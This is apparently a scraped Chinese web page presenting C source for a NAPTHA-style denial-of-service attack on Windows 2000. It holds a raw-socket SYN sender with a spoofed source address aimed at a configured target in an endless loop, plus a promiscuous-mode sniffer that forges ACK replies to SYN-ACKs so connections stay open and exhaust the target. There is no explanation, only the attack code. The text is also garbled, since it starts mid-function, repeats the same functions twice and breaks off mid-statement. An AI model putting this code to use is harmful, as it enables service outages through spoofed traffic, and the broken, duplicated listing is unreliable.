NAPTHA攻击方式在2K下的简单实现
减小字体
增大字体lpPacket,
TRUE)==FALSE)
{
printf("Error sending the packets!\n");
return 0;
}
Sleep(30000);
}
PacketFreePacket(lpPacket);
PacketCloseAdapter(lpAdapter);
return 0;
}
DWORD WINAPI ThreadSynFlood(LPVOID lp)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
int SourcePort;
char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
printf("WSAStartup Error!\n");
return 0;
}
sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket Setup Error!\n");
return 0;
}
flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!\n");
return false;
}
nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR) //设置发送的时间
{
printf("setsockopt SO_SNDTIMEO error!\n");
return false;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(ATPORT);
addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)); //IP总长度
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=123;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=inet_addr(ATIP);
tcpHeader.th_dport=htons(ATPORT);
tcpHeader.th_ack=0;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=2;
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_seq=htonl(0x12345678);
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
ipHeader.sourceIP=inet_addr(SNOOPIP);
while(TRUE)
{
SourcePort=GetTickCount()%65534;
tcpHeader.th_sport=htons(SourcePort);
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return false;
}
else printf("send ok!\n");
Sleep(SLEEPTIME);
}//endwhile
closesocket(sock);
WSACleanup();
return 0;
}
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
DWORD WINAPI SnifferSynAck(LPVOID lp)
{
LPADAPTER lpAdapter;
static CHAR AdapterList[10][1024];
ULONG AdapterNum;
WCHAR AdapterName[2048];
WCHAR *temp,*temp1;
ULONG AdapterLength=1024;
ULONG i,adapter_num=0;
if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
{
printf("Unable to retrieve the list of the adapters!\n");
return 0;
}
temp = AdapterName;
temp1=AdapterName;
i = 0;
while ((*temp != '\0')||(*(temp-1) != '\0'))
{
if (*temp == '\0')
{
memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
temp1=temp+1;
i++;
}
temp++;
}
AdapterNum = i;
for (i = 0; i < AdapterNum; i++)
wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
printf("\nPlease select adapter number:");
scanf("%d",&i);
if(i>AdapterNum)
{
printf("\nInput Number error!");
return 0;
}
IsGoOn = TRUE;
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[i-1]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return 0;
}
//设置网卡为混杂模式
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning: Unable to set the adapter to promiscuous mode\n");
}
if(PacketSetBuff(lpAdapter,1024*10)==FALSE)
{
printf("PacketSetBuff Error: %d\n",GetLastError());
return -1;
}
while ( 1 )
{
TCHAR Buffer[1024*10]={0};
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,Buffer,sizeof(Buffer));
PacketReceivePacket(lpAdapter,lpPacket,TRUE);
AnalyseData( lpPacket );
PacketFreePacket(lpPacket);
}
return 0;
}
void AnalyseData (LPPACKET lpPacket)
{
char *Buf;
EHHEADR *lpEthdr;
bpf_hdr *lpBpfhdr;
Buf=(char *)lpPacket->Buffer;
lpBpfhdr=(bpf_hdr *)Buf;
lpEthdr=(EHHEADR *)(Buf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800) && (!memcmp(lpEthdr->eh_dst,SMacAddr,6)) )
{
TCPHEADER *lpTcphdr;
lpTcphdr=(TCPHEADER *)(Buf+lpBpfhdr->bh_hdrlen+sizeof(EHHEADR)+sizeof(IPHEADER));
if ( lpTcphdr->th_ack == ntohl(0x12345678+1) && lpTcphdr->th_flag == 0x12)
{
SendAck(lpTcphdr->th_seq,lpTcphdr->th_ack,lpTcphdr->th_dport);
}
}
}
void SendAck ( DWORD SEQ , DWORD ACK ,USHORT SPort)
{
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;
sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
{
printf("Error sending the packets!\n");
return 0;
}
Sleep(30000);
}
PacketFreePacket(lpPacket);
PacketCloseAdapter(lpAdapter);
return 0;
}
DWORD WINAPI ThreadSynFlood(LPVOID lp)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
int SourcePort;
char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
printf("WSAStartup Error!\n");
return 0;
}
sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket Setup Error!\n");
return 0;
}
flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!\n");
return false;
}
nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR) //设置发送的时间
{
printf("setsockopt SO_SNDTIMEO error!\n");
return false;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(ATPORT);
addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)); //IP总长度
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=123;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=inet_addr(ATIP);
tcpHeader.th_dport=htons(ATPORT);
tcpHeader.th_ack=0;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=2;
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_seq=htonl(0x12345678);
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
ipHeader.sourceIP=inet_addr(SNOOPIP);
while(TRUE)
{
SourcePort=GetTickCount()%65534;
tcpHeader.th_sport=htons(SourcePort);
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return false;
}
else printf("send ok!\n");
Sleep(SLEEPTIME);
}//endwhile
closesocket(sock);
WSACleanup();
return 0;
}
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
DWORD WINAPI SnifferSynAck(LPVOID lp)
{
LPADAPTER lpAdapter;
static CHAR AdapterList[10][1024];
ULONG AdapterNum;
WCHAR AdapterName[2048];
WCHAR *temp,*temp1;
ULONG AdapterLength=1024;
ULONG i,adapter_num=0;
if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
{
printf("Unable to retrieve the list of the adapters!\n");
return 0;
}
temp = AdapterName;
temp1=AdapterName;
i = 0;
while ((*temp != '\0')||(*(temp-1) != '\0'))
{
if (*temp == '\0')
{
memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
temp1=temp+1;
i++;
}
temp++;
}
AdapterNum = i;
for (i = 0; i < AdapterNum; i++)
wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
printf("\nPlease select adapter number:");
scanf("%d",&i);
if(i>AdapterNum)
{
printf("\nInput Number error!");
return 0;
}
IsGoOn = TRUE;
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[i-1]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return 0;
}
//设置网卡为混杂模式
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning: Unable to set the adapter to promiscuous mode\n");
}
if(PacketSetBuff(lpAdapter,1024*10)==FALSE)
{
printf("PacketSetBuff Error: %d\n",GetLastError());
return -1;
}
while ( 1 )
{
TCHAR Buffer[1024*10]={0};
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,Buffer,sizeof(Buffer));
PacketReceivePacket(lpAdapter,lpPacket,TRUE);
AnalyseData( lpPacket );
PacketFreePacket(lpPacket);
}
return 0;
}
void AnalyseData (LPPACKET lpPacket)
{
char *Buf;
EHHEADR *lpEthdr;
bpf_hdr *lpBpfhdr;
Buf=(char *)lpPacket->Buffer;
lpBpfhdr=(bpf_hdr *)Buf;
lpEthdr=(EHHEADR *)(Buf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800) && (!memcmp(lpEthdr->eh_dst,SMacAddr,6)) )
{
TCPHEADER *lpTcphdr;
lpTcphdr=(TCPHEADER *)(Buf+lpBpfhdr->bh_hdrlen+sizeof(EHHEADR)+sizeof(IPHEADER));
if ( lpTcphdr->th_ack == ntohl(0x12345678+1) && lpTcphdr->th_flag == 0x12)
{
SendAck(lpTcphdr->th_seq,lpTcphdr->th_ack,lpTcphdr->th_dport);
}
}
}
void SendAck ( DWORD SEQ , DWORD ACK ,USHORT SPort)
{
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;
sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
